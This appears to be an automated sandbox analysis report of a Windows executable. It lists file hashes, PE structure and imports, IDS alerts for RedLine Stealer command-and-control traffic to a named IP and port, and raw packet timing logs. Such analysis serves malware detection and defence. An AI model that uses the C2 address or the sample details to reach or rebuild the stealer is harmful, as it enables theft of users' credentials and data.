                                                                                                                                                                                                                        Size (bytes):1096264
                                                                                                                                                                                                                        Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                        MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                        SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                        SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                        SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\systemsx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):309760
                                                                                                                                                                                                                        Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                        MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                        SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                        SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                        SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):307712
                                                                                                                                                                                                                        Entropy (8bit):6.283898970170584
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:O2JKCwoXjMvjfTK/zNTdEpZ4m1qpxXQKQrUJ0tYRVAOTIdTsImm:8CwoXjMbTKLNhEpZ4m0vXQKQrxgu
                                                                                                                                                                                                                        MD5:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        SHA1:D3406BF8D0E9AC246C272FA284A35A3560BDBFF5
                                                                                                                                                                                                                        SHA-256:0A17E2CA8F223DE67C0864FAC1D24C7BB2D0C796C46E9CE04E4DFF374C577EA1
                                                                                                                                                                                                                        SHA-512:181B1E2BD08978B6EE3DA2B48E0B113623B85C42AB8CEC2A23BD5119ABA7105FDEEF9B7B00343D37B0C8344494640CE0A51615393DEF8242334420134F75871F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2000000
                                                                                                                                                                                                                        Entropy (8bit):1.3174564123367891
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxzI1aIqTcUTGhoY1y:oq6+ouCpk2mpcWJ0r+QNTBfvFI+Y
                                                                                                                                                                                                                        MD5:7BCE43CC96CC747B5909B5FA404C7FFE
                                                                                                                                                                                                                        SHA1:3065EC384E6141143F613C56869545EE02C413A6
                                                                                                                                                                                                                        SHA-256:7A6019033FF050C41D0A2CF3047D6679EDEE582708970535B65A2E3DACBD9B1D
                                                                                                                                                                                                                        SHA-512:E6F20334D034CA78AA7BB78F0BC61E7DC04DCCDBC9E2947F78F40563D1C65419C45DC14C91175BD83957BBECE5EBD959BFFE920D70AAFC6C7BE3863302AC175F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Grabber.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):2.8738882384881608
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:K6qneGSDSB.exe
                                                                                                                                                                                                                        File size:2'672'128 bytes
                                                                                                                                                                                                                        MD5:52c82f6ceb8cf41de8a4c01b313e3712
                                                                                                                                                                                                                        SHA1:69b699431dbbee3b6fd76d762a27db30f1f792b5
                                                                                                                                                                                                                        SHA256:0a9bec73980eb6774e0e50da9dd812551d20a7d839020976ebdc0fb93ed2ebf9
                                                                                                                                                                                                                        SHA512:b1022ea6a0859679f33c7d01918a2b63278205f61d9d0d77be8f34f5f973ae67b0f049353358521dac3dc0e1f43af93204f2cda17b0a0e3d4f28708d69f12aab
                                                                                                                                                                                                                        SSDEEP:12288:CId+rFKcOyCwoXjMbTKLNhEpZ4m0vXQKQrxgbcv0NTR:7d+9CwoXjMbTUhgqm01cvkTR
                                                                                                                                                                                                                        TLSH:C7C536C22381E096F297613EC01457F4DE6AACE5F225CD8B5290BE6E3A331C14BD7A57
                                                                                                                                                                                                                        Icon Hash:0f0d57969617070f
                                                                                                                                                                                                                        Entrypoint:0x140001b6c
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x67585BF2 [Tue Dec 10 15:19:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 47087efffcd29d4c0a6c8a29360deeec

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18314 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x251000 | 0x3f0c4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x24f000 | 0xf6c | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x250000 | 0x688 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16a70 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x16930 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x250 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xd6c0 | 0xd800 | 7edfdf1c7fa56ca23e14fef624511a12 | False | 0.5919596354166666 | data | 6.434619687813369 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xf000 | 0x9ad8 | 0x9c00 | f7fe3d2d39b8871c2798825c2a09b851 | False | 0.4179186698717949 | data | 4.629568648709481 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x19000 | 0x2354f8 | 0x234400 | ebf64b61c4d348aaf134ea4adde54bb8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x24f000 | 0xf6c | 0x1000 | 7d902051aef0a0a5d08edd385fbf694d | False | 0.4677734375 | data | 4.738426819629228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x250000 | 0x688 | 0x800 | 9a9e49b840103d1f62a030c9badcdd2b | False | 0.4990234375 | data | 4.922451644131149 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x251000 | 0x3f0c4 | 0x3f200 | c507745b6bf7361f3190829782b82367 | False | 0.035032487623762376 | data | 2.8756617613603876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x2510b8 | 0x3eff8 | Device independent bitmap graphic, 250 x 500 x 32, image size 250000 | | | 0.03466129282281817 |
| RT_GROUP_ICON | 0x2900b0 | 0x14 | data | | | 1.15 |

| DLL | Import |
|---|---|
| KERNEL32.dll | WriteFile, CreateFileW, LoadLibraryA, CloseHandle, GetProcAddress, CreateProcessW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, WriteConsoleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-15T09:12:07.859403+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.5 | 49707 | 185.81.68.147 | 80 | TCP
2024-12-15T09:12:10.502400+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.5 | 49708 | 185.81.68.147 | 80 | TCP
2024-12-15T09:12:11.312305+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:11.312305+0100 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:11.747831+0100 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 185.81.68.147 | 1912 | 192.168.2.5 | 49709 | TCP
2024-12-15T09:12:16.838110+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:17.275073+0100 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 185.81.68.147 | 1912 | 192.168.2.5 | 49709 | TCP
2024-12-15T09:12:17.585683+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.059346+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.560307+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:18.864446+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:19.934900+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:20.239393+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:20.551913+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:21.044107+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:22.123287+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:22.563933+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:23.696023+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:24.134576+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:24.574403+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:25.139811+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:25.618679+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.056348+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.495368+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:26.932334+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:27.682095+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:27.802215+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:32.460143+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:33.130578+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:33.566408+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:34.002387+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
2024-12-15T09:12:34.479473+0100 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49709 | 185.81.68.147 | 1912 | TCP
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125749111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125785112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.125830889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156411886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156436920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.156533003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.170989990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.171129942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243345022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243395090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.243555069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245697975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245719910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.245810986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250787973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250910044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.250974894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255832911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255852938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.255928993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260708094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260915041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.260987997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265746117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265768051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.265830040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270467997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270528078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.270586967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275407076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275523901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.275645971 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280513048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280672073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.280759096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285248041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285276890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.285351992 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290046930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290069103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.290146112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.294775009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.295005083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.295072079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299731016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299835920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.299912930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305651903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305675983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.305737972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308485031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308502913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.308567047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312298059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312606096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.312674046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316220999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316339016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.316505909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320358992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320379972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.320460081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324223995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324309111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.324377060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435827017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435921907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.435981989 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437374115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437886000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.437932014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.438052893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440603018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440628052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.440660954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443666935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443706989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.443716049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446649075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446696043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.446706057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449474096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449528933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.449584007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452467918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452487946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.452524900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455172062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455223083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.455230951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458261013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458281040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.458317041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460797071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460849047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.460902929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.463767052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.463787079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.677061081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.677098989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679249048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679306030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.679393053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681601048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681644917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.681689978 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683731079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683790922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.683856010 CET8049707185.81.68.147192.168.2.5
